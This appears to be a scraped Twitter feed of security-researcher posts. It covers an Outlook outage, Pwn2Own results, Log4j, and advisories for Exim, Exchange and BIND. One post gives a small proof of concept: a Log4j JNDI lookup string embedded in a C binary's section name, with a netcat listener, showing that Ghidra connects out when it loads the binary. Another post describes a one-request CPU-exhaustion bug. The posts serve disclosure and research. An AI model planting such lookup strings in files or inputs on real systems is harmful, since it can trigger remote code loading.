Siva Siva

uhmm what's going on at @Microsoft, their login experience has been broken for over 24 hours now. The comms team seems to have declared victory and moved on? Am I overreacting, or is this unusually long? I don’t recall problems like this dragging on in the past.

@MSFT365Status please check again, you're still down

We’ve confirmed service health has returned to normal and reporting users that have completed the additional steps are able to access Outlook and Hotmail. For the list of mitigation steps and more information, please review the attached screenshot or visit status.cloud.microsoft > Microsoft consumer products > Outlook.com.

We're investigating an issue where users may be experiencing intermittent issues accessing Outlook.com. For more information, please visit status.cloud.microsoft.

@thezdi @abdhariri Woah! Congrats Abdul!

Boom! It takes @abdhariri less than 15 seconds to kick off #Pwn2Own Vancouver with a successful exploit of #Adobe Reader on macOS. He's off to the disclosure room to discuss the details of his research.

@thezdi @rskvp93 @_q5ca @hoangnx99 @vcslab Nice! Looking forward to a writeup of this one :)

Team Viettel (@rskvp93, @_q5ca, @hoangnx99 from @vcslab) with another win! #P2OToronto #Pwn2Own

Who knew if an attacker can modify your app configs that it could lead to bad things? ¯\_(ツ)_/¯

If developers dont know that untrustred data should not be passed to a JNDI lookup op then WE (the security community) have failed them. Its not THEIR fault

This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage. "I work on Log4j in my spare time" "always dreamed of working on open source full time" "3 sponsors are funding @rgoers's work: Michael, Glenn, Matt" People, what are we doing.

Ghidra's vulnerable to log4j: __attribute__((__section__(".note.${jndi:ldap://127.0.0.1:1234/abc}"))) int a = 1; int main(){} $ gcc hello.c $ nc -l 1234 Load into Ghidra; it connects to 127.0.0.1:1234. Ghidra 10.0.2, macOS OpenJDK Corretto 11.0.4.11.1 drive.google.com/file/d/1TRx7La…

@pyn3rd Woah I didn’t realize that this finding was from your team. Great finding!

#OBTS was just surreal. many thanks to everyone for the warm reception, you can find my slides detailing the story behind 5 app/macro sandbox escapes stemming from one root cause here: github.com/ronwai/talks/b…

Checkout @pyn3rd's awesome work on JDBC attacks from HITB: conference.hitb.org/hitbsecconf202…

honoured to speak alongside so many brilliant folks at #OBTS v4 #Environmental%20Disaster" target="_blank" rel="nofollow noopener">objectivebythesea.com/v4/talks.html#… see y'all in Maui!! 🏖️🌴

Are you an IDA Pro or Ghidra wizard 🧙‍♂️ Put your reverse engineering & binary exploitation skills to the test on new @okta binaries during our #oktabash2021 ⭐ Apply below ⬇️ bgcd.co/3gusT60 #bugbounty #bugbountytips

@thracky Oh damn! RIP 😅

@zebasquared I’ll just say it involves Java and you can probably at least figure out the vendor 😛

Ahahaha an infinite loop with a GET request or a POST with content-length of 0. 1 request = 1 core pegged at 100%.

@thracky 🤦 are you allowed to disclose the product?

RIP

Qualys Research Team discovered 21 severe vulnerabilities in Exim, the mail transfer agent (MTA) responsible for 60% of internet mail traffic. #21Nails could allow a remote attacker to gain full root privileges on the target server & execute commands. blog.qualys.com/vulnerabilitie…

I just published Microsoft Exchange From Deserialization to Post-Auth RCE (CVE-2021–28482) link.medium.com/a2T3FpCjLfb

wrote a little write-up about my first MS bug: CVE-2021-26413 sec.okta.com/articles/2021/… big h/t to @mattifestation for sharing his endless knowledge!

[New Blog] Exploiting Windows RPC to bypass CFG mitigation: analysis of CVE-2021-26411 in-the-wild sample iamelli0t.github.io/2021/04/10/RPC…

Looking for an unauthenticated RCE in #BIND? How about one that's been around for 15 years? An anonymous researcher submitted just that to ZDI, and @_wmliang_ has a full analysis of this now patched bug. Read the details then patch. bit.ly/2ZPIGDd